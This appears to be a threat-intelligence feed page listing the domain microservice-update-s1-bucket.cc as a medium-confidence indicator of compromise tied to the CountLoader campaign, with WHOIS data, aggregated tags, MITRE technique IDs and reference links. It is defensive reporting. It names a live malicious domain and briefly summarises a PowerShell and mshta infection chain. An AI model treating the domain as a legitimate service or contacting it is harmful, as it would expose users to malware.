DomainMediumSignal 66/100
microservice-update-s1-bucket.cc
Location
First Seen
Dec 11, 2025
Last Seen
May 24, 2026
Found in 14 reports. Confidence: medium. · Confidence scores are heuristic. Verify before acting on results.
Domain Name
Malicious domain used for C2, phishing, or malware distribution.
MISP Category
Network Activity
Confidence
66%
Signal Score
66 / 100
IDS Rule
No
Threat Context
Tags
MITRE ATT&CK
MITRE ATT&CK TTPs
Feed Intelligence Summary
14 reports66% confidence
14
Source reports
66%
Confidence score
Category tags
abuseabusech-threatfox-c2cacracr stealeractive scanactive scanningalienvault_ransomwareamateraamaterastealerapkarmasciiasyncratautomated huntautomated threatautomated-huntautomated_attackbackdoorbad reputationbankerbase64-loaderbashbatbotnetbotnet activitybotnetdomainbrute forcebrute_forcec2c2 communicationc2 httpscensyscloakingcobalt-strikecobaltstrikecoinminercommand & controlcommand and controlcommand executioncommunication protocolcompromise iocconfigcountloadercountloader c2credential accesscredential harvestingcredential stuffingcredential theftcryptocurrencyda6ah3dapatodata encryptiondata exfiltrationdata store exposureddosddos attacksdistributed attacksdomainsdropped-by-amadeyelfencodedencryptionexeexecutable fileexfiltrationexodusexploitation activityextortionfigurefinancefinance and insurancefraudftpftp brute forcegafgytgh0stratgoceqc6skgoproxyhajimehowler cellhta scripthttp brute forcehttp scannerhttpsidentity & access exploitationidmindicatorinformation stealerinfostealeringress tool transferinitial htainjection activityinternet of thingsiocsiot botnetiot securityiot/ics attackjscriptjsonjwt tokenloaderloader httpslummastealerm68kmalicious powershell activitymalicious softwaremalvertisingmalwaremalware activitymaskgramstealermedusalockermetasploitmipsmiraimirai botnetmobile threatmozimshtamsilnetworknetwork discoverynetwork intrusion attemptsnetwork scanningnetwork securitynorth americanovel-iocnovel_iocopendirosint-volleyparaguaypassword stealingpattern 49pattern-49payloadphishingphishing attackpowerpcpowershellprecogprocess injectionprotocol exploitationproxyps urlps1pythonquasarquasar-ratquasarratransomwareratreconnaissanceremote accessremote servicesresearchedrnuarbvf urlrustystealersaint helena, ascension and tristan da cunhascams & fraudscripting attacksshshellcode injectionsliversmartloadersocial engineeringsparcspymaxssh attacksshdkitstealcsuperhsupply chain attacksystem disruptiont1008t1018t1021t1021.001t1027t1040t1041t1047t1053t1053.005t1055t1059t1059.001t1059.007t1068t1069t1071t1071.001t1076t1078t1083t1086t1087t1091t1102t1102.001t1105t1110t1110.002t1115t1132t1133t1134t1140t1189t1190t1197t1202t1204t1204.002t1218t1482t1486t1490t1496t1499.002t1499.003t1518t1539t1553t1555t1560t1563t1565t1566t1566.001t1566.002t1566.003t1567.001t1573t1595t1595.001t1595.002t1595.003tcp scanteamtelnet threatthreat actortor nodetraitortrojantrojan malwareua-wgetudp scanunited statesunknown malwareunknown-malwareunknown-stealerurls httpsvanillaratvidarwallstealerweb trafficx86xwormz5brjsogj789zip
Activity Timeline
May 24May 24
Threat Activity Heatmap
· Peak: 2026-05-24LessMore
Mon
Wed
Fri
24h
0
Dormant
7d
0
Dormant
30d
0
Dormant
3mo
1
Minimal
Threat ScoreMedium Risk
66
SIGNAL
Signal Score
66%
Confidence
14
Reports
First seenDec 11, 2025
Last seenMay 24, 2026
VirusTotal
Not checked
WHOIS
- description
- The recent CountLoader campaign, identified by McAfee Labs, exemplifies a sophisticated method of cyberattack featuring multiple layers of obfuscation and a complex infection chain. The attackers utilize various loaders including PowerShell scripts and obfuscated JavaScript executed via mshta.exe to facilitate the infection process. Each stage of this process is designed to remain hidden, employing in-memory shellcode injection techniques that further complicate detection efforts.
- domain rank
- -1
- raw
- Administrative city: REDACTED FOR PRIVACY Administrative country: Hong Kong Administrative state: HK Billing city: REDACTED FOR PRIVACY Billing country: Hong Kong Billing state: HK Create date: 2025-12-08 00:00:00 Domain name: microservice-update-s1-bucket.cc Domain registrar id: 3765.0 Expiry date: 2026-12-08 00:00:00 Name server 1: norman.ns.cloudflare.com Name server 2: indie.ns.cloudflare.com Query time: 2025-12-11 19:06:33 Registrant city: 1f8f4166599d23ee Registrant country: Hong Kong Registrant email: 9253e579452ffad5s@ Registrant name: 1f8f4166599d23ee Registrant state: 7043151881d2a7f0 Registrant zip: 1f8f4166599d23ee Technical city: REDACTED FOR PRIVACY Technical country: Hong Kong Technical state: HK Update date: 2025-12-08 00:00:00
- references
- https://www.cyderes.com/howler-cell/acr-stealer-rides-on-upgraded-countloader, https://www.huorong.cn/document/tech/vir_report/1889, https://urlhaus.abuse.ch/browse/, https://analytics.dugganusa.com/api/v1/stix/master, https://github.com/pduggusa/dugganusa-research
- subdomains count
- 0
Export & API
STIX 2.1 Bundle
CSV Export
Permalink
IOC Journey
mediumFirst detected 6 months ago · Last seen 1 month ago
Appeared in 14 threat reports